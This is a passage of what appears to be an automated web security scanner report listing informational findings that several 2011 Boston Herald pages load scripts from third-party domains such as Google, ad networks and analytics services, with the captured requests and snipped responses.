...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.614. http://www.bostonherald.com/business/technology/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/technology/

Issue detail

The response dynamically includes the following scripts from other domains (hosts taken from the script tags in the captured response body below; the capture is truncated, so the list may be incomplete):
ajax.googleapis.com, cache.heraldinteractive.com, pagead2.googlesyndication.com, edge.quantserve.com

Request

GET /business/technology/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:16:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.615. http://www.bostonherald.com/business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains (hosts taken from the script tags in the captured response body below; the capture is truncated, so the list may be incomplete):
ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com, edge.quantserve.com

Request

GET /business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:14:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.616. http://www.bostonherald.com/business/womens/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/womens/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/womens/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:26:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 54049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // subsection_alt_beta
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.617. http://www.bostonherald.com/crossword/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /crossword/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /crossword/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:11:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 31724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.618. http://www.bostonherald.com/entertainment/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:05:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 103253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.619. http://www.bostonherald.com/entertainment/arts_culture/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/arts_culture/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/arts_culture/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:12:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.620. http://www.bostonherald.com/entertainment/books/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/books/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/books/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:14:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.621. http://www.bostonherald.com/entertainment/contests/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/contests/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/contests/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:08:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.622. http://www.bostonherald.com/entertainment/fashion/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/fashion/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/fashion/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:14:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.623. http://www.bostonherald.com/entertainment/food_dining/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/food_dining/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/food_dining/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
